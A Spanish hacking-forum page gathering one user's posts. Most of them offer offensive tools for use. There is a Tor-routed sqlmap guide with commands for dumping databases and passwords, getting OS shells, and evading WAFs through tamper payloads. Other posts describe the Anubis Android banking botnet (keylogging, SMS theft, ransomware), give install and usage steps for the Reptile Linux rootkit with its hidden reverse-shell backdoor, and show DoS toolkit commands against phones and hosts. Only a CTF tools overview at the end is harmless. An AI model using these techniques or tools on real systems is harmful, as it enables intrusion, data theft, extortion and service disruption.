Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - TheHackForce

#1



SQLISNIPER es una herramienta robusta de Python diseñada para detectar inyecciones SQL ciegas basadas en el tiempo en encabezados de solicitud HTTP.Mejora el proceso de evaluación de seguridad escaneando e identificando rápidamente vulnerabilidades potenciales utilizando múltiples subprocesos, asegurando la velocidad y la eficiencia.A diferencia de otros escáneres, Sqlisniper está diseñado para eliminar falsos positivos y enviar alertas tras la detección, con la funcionalidad de notificación de discordia incorporada.

Características clave

    Detección de inyección SQL ciega basada en el tiempo: identifica las posibles vulnerabilidades de inyección SQL en encabezados HTTP.
    Escaneo multiproceso: ofrece capacidades de escaneo más rápidas a través del procesamiento concurrente.
    Notificaciones de discordia: envía alertas a través de Discord Webhook para vulnerabilidades detectadas.
    Comprobaciones de falsos positivos: implementa el análisis del tiempo de respuesta para diferenciar entre los verdaderos positivos y las falsas alarmas.
    Soporte de carga útil personalizada y encabezados: permite a los usuarios definir cargas y encabezados personalizados para el escaneo dirigido.

Instalacion_

git clone No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
cd SqliSniper
chmod +x No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
pip3 install -r requirements.txt
./sqlisniper.py -u No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#2
Hacking / Como Aprender a utilizar SQLmap y Tor
Octubre 20, 2021, 02:49:15 PM
 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta                                                                                                           

¿Que es SQLmap?

SQLmap es una de las herramienta más conocidas para hacer ataques SQLi (SQL Injection) escrita en Python. SQLmap se encarga de realizar peticiones a los parámetros de una URL que se le indiquen, ya sea mediante una petición GET, POST, en las cookies, etc. Es capaz de explotar todo tipo de SQLi como union-base, time-base-blind, base-blind-injection, heavy-queries, etc.

Brevemente os indicare comandos los cuales utilizareis mas cuando lleveis a cabo un pentesting con SQLmap.


Buscar SQL Injection en una web especifica:

./sqlmap.py -g «inurl:ednolo.alumnos.upv.es*php? site:es» –batch –beep –dbs –random-agent

Exactamente lo mismo que la anterior, pero esta vez nos conectamos mediante tor.

./sqlmap.py -g "inurl:<url>*php? site:es" --dbs --random-agent --tor --check-tor –tor-type=SOCKS5

Comprobamos si la web es vulnerable, nos mostrara las bases de datos y el baner.

./sqlmap.py -u <url> –check-tor –tor –tor-type=SOCKS5 –time-sec=25 –threads 5 –random-agent –dbs –banner –beep

Mostramos las tablas de la <base de datos> con 5 hilos

./sqlmap.py -u <url> –check-tor –tor –tor-type=SOCKS5 –time-sec=25 –threads 5 –random-agent -D <database> –tables

Mostramos las columnas de la <base de datos> y <Tabla>

./sqlmap.py -u <url> –check-tor –tor –tor-type=SOCKS5 –time-sec=25 –threads 5 –random-agent -D <database> -T <table> –columns

Realizamos un DUMP de la base de datos, tabla y columna indicada

./sqlmap.py -u <url> --check-tor --tor --tor-type=SOCKS5 --time-sec=25 --threads 5 --random-agent -D <database> -T <table> -C <column> --dump

Si queremos realizar el dump de diferentes columnas lo separamos por comas.

./sqlmap.py -u <url> --check-tor --tor --tor-type=SOCKS5 --time-sec=25 --threads 5 --random-agent -D <database> -T <table> -C <column1,column2> --dump –batch

Realizamos DUMP de todas las bases de datos

./sqlmap.py -u <url> --check-tor --tor --tor-type=SOCKS5 --time-sec=25 --threads 5 --random-agent -D <database> --tables --dump-all --batch

Comprobar con que usuario se están ejecutando las consultas.

./sqlmap.py –tor –tor-type=SOCKS5 -u <url> –time-sec=25 –threads 5 –current-user

Comprobar si el usuario con el que se están ejecutando las consultas es administrador de la base de datos

./sqlmap.py –tor –tor-type=SOCKS5 -u <url> –time-sec=25 –threads 5 –is-dba –current-db

Comprobar que privilegios tiene el usuario con el que se esta ejecutando las consultas.

./sqlmap.py –tor –tor-type=SOCKS5 -u <url> –time-sec=25 –threads 5 –privileges

Mostrar todos los usuarios

./sqlmap.py –tor –tor-type=SOCKS5 -u <url> –time-sec=25 –threads 5 –users

Obtener las contraseñas de los usuarios de la base de datos

./sqlmap.py –tor –tor-type=SOCKS5 -u <url> –time-sec=25 –threads 5 –password

Buscar caracteres en las base de datos

./sqlmap.py –tor –tor-type=SOCKS5 -u <url> –time-sec=25 –threads 5 -C <BUSCAR> –search

Subir uploader (sqlmap file uploader)

./sqlmap.py –tor –tor-type=SOCKS5 -u <url> –time-sec=25 –threads 5 –os-shell

Crear un playloads con metasploit

./sqlmap.py –tor –tor-type=SOCKS5 -u <url> –time-sec=25 –threads 5 –os-pwn

Bypass MySQL con No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

./sqlmap.py –tor –tor-type=SOCKS5 -u <url> –time-sec=25 –threads 5 –dbms «MySQL» -p «fd» –tamper «chardoubleencode.py» –dbs

Bypass MySQL con No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

./sqlmap.py –tor –tor-type=SOCKS5 -u <url> –time-sec=25 –threads 5 –dbms «MySQL» –technique U -p id –tamper «space2mysqlblank.py«

Bypass ALL

./sqlmap.py --tor --tor-type=SOCKS5  -u <url> --time-sec=25 --threads 5 --level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
Bypass MSSQL

./sqlmap.py --tor --tor-type=SOCKS5  -u <url> --time-sec=25 --threads 5 --level=5 –risk=3 tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
Bypass MYSQL

./sqlmap.py --tor --tor-type=SOCKS5  -u <url> --time-sec=25 --threads 5 --level=5 –risk=3 tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor


Todos los script para BYPASS

apostrophemask.py (UTF-8)
Örnek:
* Orjinal Komut: AND '1'='1'
* Bypass Komutu:  AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87

apostrophenullencode.py (unicode)
Örnek:
* Orjinal Komut: AND '1'='1'
* Bypass Komutu:  AND %271%27=%271%27

appendnullbyte.py ()
Örnek:
* Orjinal Komut: AND 1=1
* Bypass Komutu:  AND 1=1
Platform:
* Microsoft Access

base64encode.py (base64)
Örnek:
* Orjinal Komut: 1' AND SLEEP(5)#
* Bypass Komutu:  MScgQU5EIFNMRUVQKDUpIw==

between.py ("not between" ">")
Örnek:
* Orjinal Komut: 'A > B'
* Bypass Komutu:  'A NOT BETWEEN 0 AND B'

bluecoat.py ("like" "=")
Örnek:
* Orjinal Komut: SELECT id FROM users where id = 1
* Bypass Komutu:  SELECT%09id FROM users where id LIKE 1
Platform:
* MySQL 5.1, SGOS

chardoubleencode.py
Örnek:
* Orjinal Komut: SELECT FIELD FROM%20TABLE
* Bypass Komutu:  %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545

charencode.py
Örnek:
* Orjinal Komut: SELECT FIELD FROM%20TABLE
* Bypass Komutu:  %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

charunicodeencode.py
Örnek:
* Orjinal Komut: SELECT FIELD%20FROM TABLE
* Bypass Komutu:  %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045'
Platform:
* ASP
* No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

equaltolike.py ("like" "=")
Örnek:
* Orjinal Komut: SELECT * FROM users WHERE id=1
* Bypass Komutu:  SELECT * FROM users WHERE id LIKE 1

halfversionedmorekeywords.py
Örnek:
* Orjinal Komut: value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa
* Bypass Komutu:  value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa
Platform:
* MySQL < 5.1

ifnull2ifisnull.py ("IF(ISNULL(A), B, A)" "IFNULL(A, B)")
Örnek:
* Orjinal Komut: IFNULL(1, 2)
* Bypass Komutu:  IF(ISNULL(1), 2, 1)
Platform:
* MySQL
* SQLite (possibly)
* SAP MaxDB (possibly)

modsecurityversioned.py
Örnek:
* Orjinal Komut: 1 AND 2>1--
* Bypass Komutu:  1 /*!30000AND 2>1*/--
Platform:
* MySQL

modsecurityzeroversioned.py ("0000")
Örnek:
* Orjinal Komut: 1 AND 2>1--
* Bypass Komutu:  1 /*!00000AND 2>1*/--
Platform:
* MySQL

multiplespaces.py
Örnek:
* Orjinal Komut: UNION SELECT
* Bypass Komutu:   UNION   SELECT

nonrecursivereplacement.py
Örnek:
* Orjinal Komut: 1 UNION SELECT 2--
* Bypass Komutu:  1 UNUNIONION SELSELECTECT 2--

percentage.py ("%")
Örnek:
* Orjinal Komut: SELECT FIELD FROM TABLE
* Bypass Komutu:  %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
Platform:
* ASP

randomcase.py
Örnek:
* Orjinal Komut: INSERT
* Bypass Komutu:  InsERt

randomcomments.py
Örnek:
'INSERT' becomes 'IN/**/S/**/ERT'

securesphere.py
Örnek:
* Orjinal Komut: AND 1=1
* Bypass Komutu:  AND 1=1 and '0having'='0having'

sp_password.py ("sp_password")
Örnek:
* Orjinal Komut: 1 AND 9227=9227--
* Bypass Komutu:  1 AND 9227=9227--sp_password
Platform:
* MSSQL

space2comment.py
Örnek:
* Orjinal Komut: SELECT id FROM users
* Bypass Komutu:  SELECT/**/id/**/FROM/**/users

space2dash.py ("--")
Örnek:
* Orjinal Komut: 1 AND 9227=9227
* Bypass Komutu:  1--PTTmJopxdWJ%0AAND--cWfcVRPV%0A9227=9227
Platform:
* MSSQL
* SQLite

space2hash.py
Örnek:
* Orjinal Komut: 1 AND 9227=9227
* Bypass Komutu:  1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
Platform:
* MySQL

space2morehash.py
Platform:
* MySQL >= 5.1.13

space2mssqlblank.py
Örnek:
* Orjinal Komut: SELECT id FROM users
* Bypass Komutu:  SELECT%08id%02FROM%0Fusers
Platform:
* Microsoft SQL Server

space2mssqlhash.py
Örnek:
* Orjinal Komut: 1 AND 9227=9227
* Bypass Komutu:  1%23%0A9227=9227
Platform:
* MSSQL
* MySQL

space2mysqlblank.py
Örnek:
* Orjinal Komut: SELECT id FROM users
* Bypass Komutu:  SELECT%0Bid%0BFROM%A0users
Platform:
* MySQL

space2mysqldash.py
Örnek:
* Orjinal Komut: 1 AND 9227=9227
* Bypass Komutu:  1--%0AAND--%0A9227=9227
Platform:
* MySQL
* MSSQL

space2plus.py ("+")
Örnek:
* Orjinal Komut: SELECT id FROM users
* Bypass Komutu:  SELECT+id+FROM+users

space2randomblank.py
Örnek:
* Orjinal Komut: SELECT id FROM users
* Bypass Komutu:  SELECTridtFROMnusers

unionalltounion.py ("union all" "union")
Örnek:
* Orjinal Komut: -1 UNION ALL SELECT
* Bypass Komutu:  -1 UNION SELECT

unmagicquotes.py ("%bf%27" "--")
Örnek:
* Orjinal Komut: 1' AND 1=1
* Bypass Komutu:  1%bf%27 AND 1=1--%20

versionedkeywords.py
Örnek:
* Orjinal Komut: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#
* Bypass Komutu:  1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#
Platform:
* MySQL

versionedmorekeywords.py
Örnek:
* Orjinal Komut: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#
* Bypass Komutu:  1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#
Platform:
* MySQL >= 5.1.13


Un saludo

Happy Hacking 

#3
Hacking Tools / Anubis Android Botnet
Julio 15, 2020, 06:18:25 AM
 
Manual de instalación admin + arc + incluido
cripta, capturadores ss
La descripción no está completa ya que el bot se terminó por sí solo
Enviar SMS - envía SMS con el texto especificado al número especificado en el comando;
Iniciar USSD: ejecutar una solicitud de USSD;
Iniciar aplicación: inicia la aplicación especificada en el comando;
Reemplazar URL Admin Panel / Reenvío: cambie la dirección del servidor de administración;
Obtener todos los SMS: envíe copias del SMS almacenado en el dispositivo al servidor de administración;
Obtenga todas las aplicaciones instaladas: obtenga información sobre las aplicaciones instaladas;
Obtenga todos los permisos: verifique la disponibilidad de permisos adicionales para trabajar;
Obtener Logs Keylogger: comience a interceptar pulsaciones de teclas;
Mostrar cuadro de mensaje: muestra el cuadro de diálogo con el texto especificado en el comando;
Mostrar notificaciones push: muestra notificaciones push cuyo contenido se especifica en el comando;
Mostrar notificación automática de inserción: muestra una notificación automática cuyo contenido se especifica en el código del troyano;
Iniciar Fake-Locker: bloquea la pantalla del dispositivo mediante la ventana WebView, que mostrará el contenido de la página web especificada por el servidor;
Obtener números de la guía telefónica: transfiera todos los números de la guía telefónica al servidor;
Envío de SMS a sus contactos: envíe SMS a todos los contactos desde la guía telefónica;
Solicitar permiso para inyección: solicitar permiso para acceder a los datos;
Solicitar permiso para geolocalización: solicite permiso para determinar la ubicación del dispositivo;
Iniciar el servicio de accesibilidad: solicite acceso a las funciones de accesibilidad;
Permiso de inicio: solicite acceso a permisos adicionales;
Iniciar reenvío de llamadas: comience a reenviar llamadas al número especificado por los atacantes;
Detener el desvío de llamadas: detener el desvío de llamadas;
Abrir enlace en el navegador: abra el enlace especificado en el navegador;
Abrir enlace en actividad: abra un enlace a una página web en un WebView;
CryptoLocker: encripta los archivos almacenados en el dispositivo y muestra un mensaje con una solicitud de rescate;
Descifrar sistema de archivos - descifrar archivos;

Grabar sonido: comience a grabar el entorno utilizando el micrófono integrado en el dispositivo;
Obtener IP Bot: determine la dirección IP del dispositivo;
Kill Bot: borra el archivo de configuración del troyano y detiene la aplicación maliciosa.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#4
DroneSploit
Este marco CLI se basa en sploitkit y es un intento de reunir técnicas de hackeo y exploits especialmente enfocados en el  hackeo de drones . Para facilitar su uso, la interfaz tiene un diseño que se parece a Metasploit.
Instalar en pc
git clone No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
cd dronesploit
pip install -r require.txt
Utilizar
python3 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta





Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#5
Hacking / Re:Quack ToolKit
Marzo 27, 2020, 05:04:44 AM
pero no es el mismo bro y si lo fuera yo solo comparto actualidad nada viejo como vengo viendo en el foro
#6
Hacking Tools / Rootkit de Linux LKM Reptil
Marzo 12, 2020, 08:07:45 AM
Caracteristicas

Dar root a usuarios sin privilegios
Ocultar archivos y directorios
Ocultar procesos
Esconderse
Ocultar conexiones TCP / IP
Persistencia de arranque oculta
Manipulación del contenido del archivo
Algunas técnicas de ofuscación
Puerta trasera ICMP / UDP / TCP
Completo TTY / PTY shell con transferencia de archivos
Cliente para manejar Reptile Shell
Shell se conecta cada X veces (no predeterminado)
Registro de cambios v2.0
configurando script de inicio y arreglando
Arreglando el cifrado del remitente del paquete
líneas sin comentarios con persistencia
Definiendo PWD

Instalar en pc

apt-get install linux-headers - $ (uname -r)
perl -MCPAN -e "install String :: Unescape"
git clone No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
cd Reptile
./setup.sh install

Dar root a usuarios sin privilegios

Para obtener privilegios de root simplemente escriba:  / reptile / reptile_cmd 
archivos, directorios y módulo de kernel
Todos los archivos y carpetas que tengan  reptiles  en el nombre estarán ocultos. Puede configurar esto en el script de instalación. Los siguientes comandos ocultan / muestran archivos, carpetas, procesos y módulos del núcleo.

Para ocultar:  / reptile / reptile_cmd hide
Para mostrar:  / reptile / reptile_cmd show

Ocultar procesos

Para ocultar procesos:  / reptile / reptile_cmd hide <pid>
Para mostrar procesos:  / reptile / reptile_cmd show <pid>
Ocultar conexiones TCP / IP
Ocultar:  / reptile / reptile_cmd conn <IP> <port> hide Ocultar
:  / reptile / reptile_cmd conn <IP> <port> show

Manipulación del contenido del archivo
Todo el contenido entre etiquetas estará oculto:

# <reptil>
contenido para ocultar
# </reptile>

Puede configurar estas etiquetas en el script de instalación.
Puerta trasera
La puerta trasera es un shell inverso activado por un paquete mágico enviado a través del protocolo TCP, UDP o ICMP.
Cliente
Compilación:
./setup client

El cliente es similar a MSF y su uso es muy fácil. Ejecute  ./client  y simplemente escriba  help  para ver los comandos.



Hay otros dos binarios:  oyente  y  paquete . El  binario del cliente  manejará el  oyente y el  paquete,  pero puede usarlos por separado si desea:



Cáscara
El shell es fácil de usar, solo escriba  help  para ver los comandos.
Ya oculta su proceso y conexión.
Su conexión está encriptada
Hay un cargador de archivos y un descargador de archivos dentro.
Puede establecer un retraso para recibir una conexión inversa cada vez que lo desee.
Si ejecuta  shell  obtendrá un shell TTY / PTY completo como ssh.



Puede compilar este shell en una versión independiente para usar sin el Módulo Kernel:
./setup reverse
Tendrá que usar el  oyente  para conectarse con el shell inverso independiente porque no enviará paquetes mágicos. ¡Simplemente compile con  ./setup client  y use el  oyente  binario!

Probado en

Debian 9 : 4.9.0-8-amd64
Debian 10 : 4.19.0-8-amd64
Ubuntu 18.04.1 LTS : 4.15.0-38-genérico
Kali Linux : 4.18.0-kali2-amd64
Centos 6.10 : 2.6.32- 754.6.3.el6.x86_64
Centos 7 : 3.10.0-862.3.2.el7.x86_64
Centos 8 : 4.18.0-147.5.1.el8_1.x86_64

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Happy Hacking The Planet
#7
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Esta interesante pero debes de comprar algo y por lo general suele ser estafa cuando se trata de hacer pagos para tener la version pro. A menos que lo ayas probado personalmente y lo recomiendes.

pues amigo esta mas que probado ya  que cesar y yo nos conocemos desde la infancia somos compañeros y aun a si  seguimos juntos
#8
Hacking / Quack ToolKit
Marzo 11, 2020, 02:17:12 PM

Quack es una herramienta escrita en python3 para realizar ataques de denegacion de servicios incluye herramienta de ataque SMS, herramienta de ataque HTTP
y muchas otras herramientas de ataque

1) git clone No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

2) cd quack

3) chmod +x No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

4) ./install.sh

🦑usage: quack [-h] [--target <IP:port/URL/phone>]
             [--tool [SMS|NTP|TCP|UDP|SYN|POD|SLOWLORIS|MEMCACHED|HTTP|NJRAT]]
             [--timeout <timeout>] [--threads <threads>] [-u]

Argumento opcionales:

  -h, --help            show this help message and exit
  --target <IP:port/URL/phone>
                        Target IP:port, URL or phone.
  --tool [SMS|NTP|TCP|UDP|SYN|POD|SLOWLORIS|MEMCACHED|HTTP|NJRAT]
                        Attack tool.
  --timeout <timeout>   Timeout in secounds.
  --threads <threads>   Threads count.
  -u, --update          Update Quack Toolkit.

Ejemplo de  SMS attack:

quack --tool SMS --target 15554443333 --time 10 --threads 10
Example of the HTTP attack:

quack --tool HTTP --target No tienes permitido ver los links. Registrarse o Entrar a mi cuenta --time 10 --threads 10
Example of the TCP attack:

quack --tool TCP --target 192.168.1.100:80 --time 10 --threads 10

Video: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Happy Jodida                By CyberSec777    8)  desde la cuna asta la tumba
#9
Saludos de cybersec777 en instagram uso otro nombre con los 777 jajajajaja
#10
Hola amigos en este nuevo capitulo vamos hablar de una serie de herramientas que todo hackers o entuasiata en el ambito de la seguridad informatica deberia de tener a la hora de realizar un CTF, o "DESAFIO" ya que para realizar ciertas pruebas.  esto es necesario tenerlo en cuenta, ya que esto nos ahorrara la tarea de poder escoger mejor nuestras armas sin complicacion, donde te compartire una buena guia que te ayudara con facilidad en este camino de los CTF y tambien se que te servira para pruebas reales ya que hay momentos en los que estamos realizando un CTF,,, y en uno de esos momentos no!! recodamos ciertas herranmientas; eh... aqui donde me tome la molestia de recopilar las mas importante, ya que algunas de estas herramiestas  nos ayudaran en parte nuestro recorrido si queremos experimentar con los CTF este post va dirigino mas que todo aquellos que estan empezado en este mundo de la seguridad informatica.

Por ejemplo tenemos las herramietas de redes que son muy necesarias ya que tienen un papel muy fundamental, cuando realizamos ciertas tareas ya que entre esos tenemos ciertos analizadores de protocolo, y otros que nos ayuadan a solucionar ciertos problemas en redes de comunicaciones. con en el caso de  Wireshark, vamos a empezar hablando un poco de esta genial herramienta que sirve de mucho y que tine mucho que ver con la parte de redes.

Redes

Wireshark, tshark, es una de las mejores herramientas que nos permite analizar los paquetes en una red y nos ayuda a comprender la pila del TCP/IP, como tambien leer e interpretar los paquetes, ya que su facilidad de interceptar el trafico y convertirlo en un formato legible para las personas! ya nos esta ayudando muchisimo, si quiere saber mas sobre esta herramienta visite su pagina oficial..  cli aqui.

SYNOPSIS
tshark [ -i <capture interface>|- ] [ -f <capture filter> ] [ -2 ] [ -r <infile> ] [ -w <outfile>|- ] [ options ] [ <filter> ]
tshark -G [ <report type> ] [ --elastic-mapping-filter <protocols> ]



Netcat, esta herramienta apesar de lo sencilla que es, pero poderosa nos permite a  traves de interpretes de comandos y con una sintaxis sencilla nos permite abrir puertos TCP/IP, a diferencia de wireshark esta herramienta nos permite asociar una shell a un puerto en concreto y forzar las conexiones UDP/TCP. pagina oficial para mas informacion. cli aqui





NMAP, esta es una herramienta que cualquier hacker no pasaria por alto al momento de hacer nuestro escaneos profundos en la red, ya que es la mas conocida en la seguridad informatica ya que nos permite hacer un rastreo de puertos, y no nos puede faltar en nuestra lista.. en su pagina ofiacial encontrara muchos ejemplos de su uso



Muchas de estas herramientas nos permiten hacer infinidades de cosas ya que eso se los dejo a su imaginasion,  ya que si las nombrara todas no alcansaria para escribir tanto en un pequeño post sobre esto, cabe destacar que entre estas herramientas tambien esta Telnet, Tcpdump. que tambien ayudan en mucho..

Ahora vamos a pasar a otras herramientas que tambien nos ayudaran en este recorrido ya que no podria nombrarlas todas solo las mas destacadas. por mi concepto de uso personalizado son las que me atreveria mencionar en este post.

Crytografia
Ya que no podrian faltar muchas de estas herramientas ahora vamos a nombrar las que nos pueden ayudar con algunas tareas dificiles y tediosas como lo son las herramientas para desifrar, ya que la cryptografia; es una tecnica que se ocupa del cifrado o la codificacion destina alterar las respresentaciones linguiaticas de ciertos mensaje con el fin dehacerlos initangibles a los recectores no autorizados.

Hashpump, esta herramienta nos ayuda hacer explotaciones en los algoritmos de los hash. esta herramienta nos permite hacer varios tipos de hash incluidos MD4, MD5, SHA1, SHA256, SHA512.



Hashcat, es una herramineta que nos permite recuperar contraseñas apartir del valos hash, teniendo en cuenta que cada una ellas se almacenen en texto planos en la bases de datos. esta herramienta nos permite proveer diversos metados ya que es considerada como una de las herramientas mas poderosas y tambien consideradad como la mas rapidad en dar resultados



John The Ripper,  es programa de cryptografia que aplica fuerza bruta y nos ayuda a romper varios algoritmos, esta herramienta tambien es util para recperar contraseñas en el caso que el usuario lo haya olvidado, ya que esta herramienta es de gran utilidad por  sus diversas tecnica como los ataques de diccionarios



Cryptool,  es una herramienta que fue hecha en el lenguaje de programacion en C++  y diseñada especialmente para el sistema operativo de microsoft.
El objetivo del proyecto CrypTool es hacer que los usuarios sean conscientes de cómo la criptografía puede ayudar contra las amenazas a la seguridad de la red y explicar los conceptos subyacentes de la criptología, esta herramienta es capas de mostrar resultados exactos sin dañar las muestras extraidas y mantener el formato en orden sin alterar las pruebas



Steganografia

Steganografia: esta es una tecnica que trata del estudio y la aplicacion de tecnicas que permiten ocutar mensajes o objetos, dentro de otros llamados portadores, para ser enviados de modo que no se persiban en el hecho.
ya que esta tecnica se uiliza mucho para esconder ciertos mensajes en una imagen fotografia.

Lo cierto es que exiten muchas herramientas para usar estas tecnicas que nos ahorran tiempo, ya que son en algunos casos muy necesarias tanto en desglosar un CTF como en el ambito real vamos a pasar a mostrarles alguna de estas incleibles herramientas.

OpenStego, esta herramienta se basa en la ocultacion de datos, ya que puede ocultar cualquier dato dentro de un archivo portador, tambien nos permite añadir marcas de aguas a archivos. como por ejemplo una firma invisible, tamben puede ser utlizado para detectar la copias como por ejemplo; de un archivo no autorizado



Steghide, Steghide es un programa de esteganografía que puede ocultar datos en varios tipos de archivos de imagen y audio. Las frecuencias de muestra de color respectivamente no cambian, lo que hace que la incrustación sea resistente a las pruebas estadísticas de primer orden



Pngcheck, es una herramienta que  verifica la integridad de los archivos PNG, JNG y MNG (verificando los CRC internos [sumas de verificación] de 32 bits y descomprimiendo los datos de la imagen); opcionalmente, puede volcar casi toda la información de nivel de fragmento en la imagen en forma legible para humanos. Por ejemplo, se puede usar para imprimir las estadísticas básicas sobre una imagen (dimensiones, profundidad de bits, etc.); para enumerar la información de color y transparencia en su paleta (suponiendo que tenga una); o para extraer las anotaciones de texto incrustadas. Este es un programa de línea de comandos con capacidades por lotes



Bueno como es de esperar para seguir completando nuestro marco de herramientas y que en realidad, es muy dificil de dejar pasar por alto en nuestras pruebas como lo seria la ingeneria inversa; ya que esta tecnica nos deja mucho que desear y en lo personal se vuelve unos de mis temas favoritos por su amplitud. pero bueno para no alargar tanto hablemos un poco de la ingeneria inverse.

Ingenieria inverse

Ingenieria inverse, este termino se refiere al analisis de un proceso
o funcionamiento de una estructura en general, esta tecnica se utiliza ya sea para desarmar o descomponer piesas de un proceso en una arquitectura para asi darle una mejoria o usualmente para hacer uno nuevo, ya sea en la parte electronica del software o incluso en programas computacionales, ya que involucra ya sea para examinar un programa copilado, o ejecutable, incluso bajo condiciones controladas tambien nos permite hacer un analisis al codigo fuente, claro esta que se aplica a un lenguaje de programacion de alto nivel ya que la ingenieria inversa es una tecnica que por ser exitosa permite a profesionales o investigadores, ver como opera un programa y sus caracteristicas,wya quedando aclarado que es la inveria inversa pasemos a las herramientas que son de buena utilidad como son las siguientes...


IDA Pro, es una herramienta que se encarga del desamblado y el depurado que se emplea en la ingenieria inversa, ya que soporta una varieda de formatos ejecutables para diferentes procesadores, y sistemas operativos.
Ya esta herramienta se a convertido en el estandar por defecto, para los analisis de codigos hostil e investigacion de vulnerabilidades, y valadacion de cots



Immunyty Debugger, esta herramienta Immunity Debugger es una nueva y poderosa forma de escribir exploits, analizar malware y realizar ingeniería inversa de archivos binarios. Se basa en una interfaz de usuario sólida con gráficos de funciones, la primera herramienta de análisis de almacenamiento dinámico de la industria creada específicamente para la creación de almacenamiento dinámico y una API Python grande y bien compatible para una fácil extensibilidad



Radare2, esta herramienta tambien forma parte de nuestro ya que esta herramienta tambien es de gran ayuda para realizar diversas tareas, y para los queusamos kali linux ya la tenemos por defecto.

Radare2 es un marco completo para ingeniería inversa y análisis de binarios; compuesto por un conjunto de pequeñas utilidades que se pueden usar juntas o independientemente de la línea de comando



Objdump, es una herramienta que tambien viene por defecto en kali linux, esta herramienta, sirve para mostrar informacion de binarios ejecutables. ya que trae diferentes opciones, que posee cabeceras, simbolos, formatos y arquitecturas



Ahora como era de esperar ya para terminar nestro  kit de herramientas que nos seviran como guia, ya que exiten muchisimas mas de ingenieria inversa. asi como las mencionadas anteriormente, asi como lo es Strace, Nm, Compilers, y Ollydbg, que es muy buena pero realmente esta un poco desatualizada, entre otras que podrian ayudar muchisimo a la hora de hacer diversas tareas segun lo previsto, pero ya eso sera en otro capitulo donde hablaremos del restante.

Entoces para terminar de mencionar nuetro Kit de herramientas, y por ultimo no podria faltar las herramientas de forense  que son de mucha ayuda ya que en esta seccion damos por terminado este arsenal educativo que compone parte de un sin fin de herramientas.


Forensics


Forensics, consiste en la aplicación de técnicas científicas y analíticas especializadas a infraestructura tecnológica que permiten identificar preservar analizar y presentar datos que sena validos dentro de un proceso legal.
La informática forense ejercida por el perito informático forense se ha convertido en una unidad cada vez más importante dentro del organigrama policial debido al "crecimiento exponencial" que están experimentando las nuevas formas de delincuencia digitales como el hacking, el phising o el pharming.


ExifTool, es un programa de software gratuito y de código abierto para leer, escribir y manipular metadatos de imagen, audio, video y PDF. Es independiente de la plataforma, disponible como una biblioteca Perl y una aplicación.
